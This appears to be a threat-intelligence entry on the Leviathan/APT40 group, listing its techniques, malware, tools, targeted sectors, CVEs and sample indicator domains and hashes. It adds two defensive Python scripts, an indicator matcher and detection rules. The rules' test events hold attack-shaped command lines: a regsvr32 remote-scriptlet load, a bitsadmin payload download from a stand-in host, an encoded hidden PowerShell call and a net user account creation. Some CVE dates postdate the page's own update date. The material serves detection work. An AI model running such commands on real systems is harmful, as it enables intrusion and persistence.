Leviathan
Essential information
- Confidence: 100/100
- Published: 16/12/2025 19:39
- Modified: 27/03/2026 01:13
- Updated at: 27/03/2026 01:13
- Revoked: No
- Author / Source: The MITRE Corporation
- Resource level: —
- Primary motivation: —
- Related entities
- 51 attack patterns (MITRE), 19 malware, 9 sectors, 3 countries, 105 indicators, 5 vulnerabilities (CVE), 7 tools, 1 campaign
Aliases
MUDCARP, Kryptonite Panda, Gadolinium, BRONZE MOHAWK, TEMP.Jumper, TEMP.Periscope, Gingham Typhoon, APT40
Description
Marking (TLP)
TLP:CLEAR Copyright 2015-2025, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.
External references
- CISA AA21-200A APT40 July 2021
- FireEye APT40 March 2019
- SecureWorks BRONZE MOHAWK n.d.
- Microsoft Threat Actor Naming July 2023
- CISA Leviathan 2024
- Crowdstrike KRYPTONITE PANDA August 2018
- mitre-attack (G0065)
- Accenture MUDCARP March 2019
- MSTIC GADOLINIUM September 2020
- FireEye Periscope March 2018
- Proofpoint Leviathan Oct 2017
Related entities
Attack patterns, malware, vulnerabilities, indicators and other entities linked to this intrusion set.
Attack patterns (MITRE) (51; 11 listed on this page; relationship: uses)
- T1027.003 Obfuscated Files or Information: Steganography
- T1218.010 System Binary Proxy Execution: Regsvr32
- T1589.001 Gather Victim Identity Information: Credentials
- T1587.004 Develop Capabilities: Exploits
- T1021.001 Remote Services: Remote Desktop Protocol
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1585.002 Establish Accounts: Email Accounts
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1003 OS Credential Dumping
- T1584.004 Compromise Infrastructure: Server
- T1074.002 Data Staged: Remote Data Staging
Malware (19; 9 listed on this page; relationship: uses)
- BADFLICK
- gh0st RAT (S0032)
- BLACKCOFFEE
- Derusbi (S0021); source: AlienVault, confidence 100
- Orz (S0229)
- NanHaiShu (S0228); source: The MITRE Corporation, confidence 100. [NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South…
- Cobalt Strike
- MURKYTOP (S0233); source: The MITRE Corporation, confidence 100. [MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)
- PowerSploit (S0194)
Sectors (9; relationship: targets)
- Healthcare
- Government
- Healthcare research
- Manufacturing
- Defense
- Aerospace
- Education
- Maritime transport
- Transportation
Countries (3; relationship: targets)
- United States of America
- China
- Canada
Indicators (105; 11 listed on this page; relationship: indicates)
Several entries are marked revoked and carry a validity window that has already closed, so treat them as historical hunting context rather than as live block-list material.
- indiadigest.in (domain)
- 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362 (SHA-256)
- nmw4xhipveaca7hm.onion.link (domain; onion.link is a Tor2web-style clearnet gateway to Tor hidden services)
- 2807071ec9d2d3a7e8609e1d16f1e7cce950ae4f57e6b1e0463a34865f75d3a1 (SHA-256)
- santaclarasystem.us (domain; NS=ns1.santaclarasystem.us; STIX, 100/100, revoked; valid until 08/06/2022; source: AlienVault)
- Exploit:O97M/CVE-2017-0199!rfn, "SHA256 of 35f456afbe67951b3312f3b35d84ff0a" (Microsoft Defender detection name for a document exploiting CVE-2017-0199; the 32-hex-character value given has MD5 length, not SHA-256 length; STIX, 100/100, revoked; valid until 26/10/2020; source: AlienVault)
- cdf6e2e928a89cbb857e688055a25e37a8d8b8b90530bd52c8548fb544f66f1f (SHA-256; STIX, 100/100, revoked; valid until 15/11/2022; source: AlienVault)
- yootypes.com (domain)
- thyssenkrupp-marinesystems.org (domain; a lookalike of the ThyssenKrupp Marine Systems name; STIX, 100/100, revoked; valid until 19/05/2020; source: AlienVault)
- newbb-news.com (domain; NS=ns1.newbb-news.com; STIX, 100/100, revoked; valid until 08/06/2022; source: AlienVault)
- thestar.live (domain)
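The indicators above are only useful once they are matched against telemetry with the right normalisation (case, trailing dots, subdomains) and with their revoked/expired state respected. The script below is an added example, not code from the page or from any vendor feed: the domains, SHA-256 values, revoked flags and validity dates are copied from the list above, while the log lines it scans are constructed for the example.

```python
"""Match this page's listed indicators against log lines.

Added example, not part of the page or of any vendor's tooling. The domains,
SHA-256 values, 'revoked' flags and validity dates are copied from the page's
indicator list; the log lines are constructed for the example.
"""
import re
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Indicator:
    value: str
    kind: str                           # "domain" or "sha256"
    revoked: bool = False
    valid_until: Optional[date] = None  # the page shows dd/mm/yyyy


# Copied from the page's indicator list (11 of its 105 entries are shown there).
INDICATORS: List[Indicator] = [
    Indicator("indiadigest.in", "domain"),
    # onion.link is a Tor2web-style clearnet gateway to Tor hidden services.
    Indicator("nmw4xhipveaca7hm.onion.link", "domain"),
    Indicator("santaclarasystem.us", "domain", revoked=True, valid_until=date(2022, 6, 8)),
    Indicator("yootypes.com", "domain"),
    Indicator("thyssenkrupp-marinesystems.org", "domain", revoked=True, valid_until=date(2020, 5, 19)),
    Indicator("newbb-news.com", "domain", revoked=True, valid_until=date(2022, 6, 8)),
    Indicator("thestar.live", "domain"),
    Indicator("5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362", "sha256"),
    Indicator("2807071ec9d2d3a7e8609e1d16f1e7cce950ae4f57e6b1e0463a34865f75d3a1", "sha256"),
    Indicator("cdf6e2e928a89cbb857e688055a25e37a8d8b8b90530bd52c8548fb544f66f1f", "sha256",
              revoked=True, valid_until=date(2022, 11, 15)),
]

# Constructed log lines (proxy, DNS and EDR style); not from any real incident.
SAMPLE_LOGS = [
    "2026-03-20T10:01:02Z proxy user=jdoe dst=http://cdn.yootypes.com/update.js action=allow",
    "2026-03-20T10:01:09Z dns query=mail.newbb-news.com type=A rcode=NOERROR",
    "2026-03-20T10:02:44Z edr host=WS-12 file=C:\\Users\\Public\\a.exe "
    "sha256=5860DDC428FFA900258207E9C385F843A3472F2FBF252D2F6357D458646CF362",
    "2026-03-20T10:03:00Z dns query=www.example.com type=A rcode=NOERROR",
]

HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,63})\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def normalize_host(host: str) -> str:
    """Lower-case and drop a trailing dot so DNS-style FQDNs compare equal."""
    return host.lower().rstrip(".")


def domain_matches(seen: str, ioc: str) -> bool:
    """True for the IOC itself or any subdomain of it, never for a longer label
    that merely ends with the same characters (e.g. 'notnewbb-news.com')."""
    seen, ioc = normalize_host(seen), normalize_host(ioc)
    return seen == ioc or seen.endswith("." + ioc)


def status(ioc: Indicator, today: date) -> str:
    """'stale' if the feed revoked it, 'expired' if past valid_until, else 'active'."""
    if ioc.revoked:
        return "stale"
    if ioc.valid_until is not None and today > ioc.valid_until:
        return "expired"
    return "active"


def scan(lines: List[str], indicators: List[Indicator] = INDICATORS,
         today: date = date(2026, 3, 27)) -> List[Tuple[int, str, str]]:
    """Return (line number, indicator value, status) for every IOC seen in the lines."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        hosts = {normalize_host(h) for h in HOST_RE.findall(line)}
        hashes = {h.lower() for h in SHA256_RE.findall(line)}
        for ioc in indicators:
            if ioc.kind == "domain" and any(domain_matches(h, ioc.value) for h in hosts):
                hits.append((lineno, ioc.value, status(ioc, today)))
            elif ioc.kind == "sha256" and ioc.value.lower() in hashes:
                hits.append((lineno, ioc.value, status(ioc, today)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

A hit on a revoked or expired indicator is reported with its state rather than dropped: it is still worth a look in an investigation, but it should not trigger an automated block on its own.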
Vulnerabilities (CVE) (5)
Listed by description only; the page does not give the CVE identifiers.
- Atlassian Confluence Server and Data Center: Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute … (Published 03/11/2021 · Modified 21/12/2025)
- Microsoft Exchange Server: unspecified vulnerability that allows for privilege escalation (Published 03/11/2021 · Modified 20/12/2025)
- Microsoft Exchange Server: unspecified vulnerability that allows for security feature bypass (Published 03/11/2021 · Modified 20/12/2025)
- Apache Log4j2: JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution (Attack vector: Network · Published 10/12/2021 · Modified 27/05/2026)
- Microsoft Exchange Server: unspecified vulnerability that allows for remote code execution (Published 03/11/2021 · Modified 29/05/2026)
Tool (7; relationship: uses; source: The MITRE Corporation, confidence 100)
- PowerSploit (S0194): [PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code…
- Tor (S0183): [Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the…
- BITSAdmin (S0190): [BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)
- at (S0110): [at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)(Citation: Linux at)
- Net (S0039): The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft…
- Empire (S0363): [Empire](https://attack.mitre.org/software/S0363) is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents…
- Windows Credential Editor (S0005): [Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)
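The attack-pattern list (Regsvr32, PowerShell) and the tool list (BITSAdmin, at, Net) share a theme: built-in Windows binaries doing the attacker's work, which defenders catch on command-line shape rather than on file hashes. The rules below are an added example written for this page, not MITRE's content and not the group's documented command lines; they are generic heuristics for the listed techniques, and the process-creation events they run over are constructed (example.invalid is a reserved name and the base64 blob is filler).

```python
"""Flag the living-off-the-land tooling this page lists for Leviathan
(regsvr32, PowerShell, BITSAdmin, at, Net) in process-creation events.

Added example, not the page's or MITRE's code. The rules are generic
technique heuristics written for this example, not the group's documented
command lines, and the events are constructed.
"""
import ntpath
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # keys: id, image, cmdline

# Constructed Sysmon/EDR-style process-creation events; example.invalid is a
# reserved name and the base64 blob is filler, not a real encoded command.
SAMPLE_EVENTS: List[Event] = [
    {"id": "1", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://cdn.example.invalid/p.sct scrobj.dll"},
    {"id": "2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": "3", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin.exe /transfer job1 /download /priority high http://cdn.example.invalid/a.exe C:\Users\Public\a.exe"},
    {"id": "4", "image": r"C:\Windows\System32\at.exe",
     "cmdline": r"at.exe \\FILESRV01 23:00 cmd /c C:\Users\Public\a.exe"},
    {"id": "5", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net.exe user svc_backup P@ssw0rd! /add"},
    # Benign look-alikes that the rules must not flag.
    {"id": "6", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"'},
    {"id": "7", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"id": "8", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net.exe use Z: \\fs01\share /persistent:no"},
]


def image_name(ev: Event) -> str:
    # Compare the basename, not a suffix: "format.exe".endswith("at.exe") is True.
    return ntpath.basename(ev["image"]).lower()


def regsvr32_remote_scriptlet(ev: Event) -> bool:
    """T1218.010: regsvr32 loading a scriptlet over HTTP(S) or through scrobj.dll."""
    cmd = ev["cmdline"]
    return image_name(ev) == "regsvr32.exe" and (
        re.search(r"/i:https?://", cmd, re.I) is not None
        or "scrobj.dll" in cmd.lower())


def powershell_encoded_or_cradle(ev: Event) -> bool:
    """T1059.001: -EncodedCommand (any accepted abbreviation) or a download cradle."""
    if image_name(ev) not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = ev["cmdline"]
    # \b keeps -ExecutionPolicy from matching the -e prefix.
    encoded = re.search(r"\s-e(?:ncodedcommand|nc|c|n)?\b", cmd, re.I) is not None
    cradle = any(t in cmd.lower() for t in
                 ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "invoke-expression"))
    return encoded or cradle


def bitsadmin_download(ev: Event) -> bool:
    """T1197: BITS job created from the command line with an HTTP(S) source."""
    cmd = ev["cmdline"]
    return image_name(ev) == "bitsadmin.exe" and (
        re.search(r"/(?:transfer|addfile)\b", cmd, re.I) is not None
        and re.search(r"https?://", cmd, re.I) is not None)


def at_remote_schedule(ev: Event) -> bool:
    """at.exe scheduling a command on a remote host (\\\\host HH:MM command)."""
    cmd = ev["cmdline"]
    return image_name(ev) == "at.exe" and (
        re.search(r"\\\\\S+\s+\d{1,2}:\d{2}\b", cmd) is not None)


def net_account_add(ev: Event) -> bool:
    """net user/localgroup/group ... /add: account creation or group membership change."""
    cmd = ev["cmdline"]
    return image_name(ev) in ("net.exe", "net1.exe") and (
        re.search(r"\b(?:user|localgroup|group)\b.*\s/add\b", cmd, re.I) is not None)


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("T1218.010 regsvr32 remote scriptlet", regsvr32_remote_scriptlet),
    ("T1059.001 PowerShell encoded command or download cradle", powershell_encoded_or_cradle),
    ("T1197 BITSAdmin HTTP transfer", bitsadmin_download),
    ("at.exe remote scheduled command", at_remote_schedule),
    ("net.exe account or group change", net_account_add),
]


def evaluate(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) for every rule that fires on each event."""
    return [(ev["id"], name) for ev in events for name, rule in RULES if rule(ev)]


if __name__ == "__main__":
    for event_id, rule_name in evaluate(SAMPLE_EVENTS):
        print(event_id, rule_name)
```

Each rule keys on the image basename rather than a suffix match and on the argument shape that separates abuse from routine administration (a remote scriptlet URL, an encoded command, an HTTP source for a BITS job, a remote host plus time for at, an /add for net); events 6 to 8 show the benign forms that must stay quiet.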
Campaign (1; relationship: attributed-to)
- Leviathan Australian Intrusions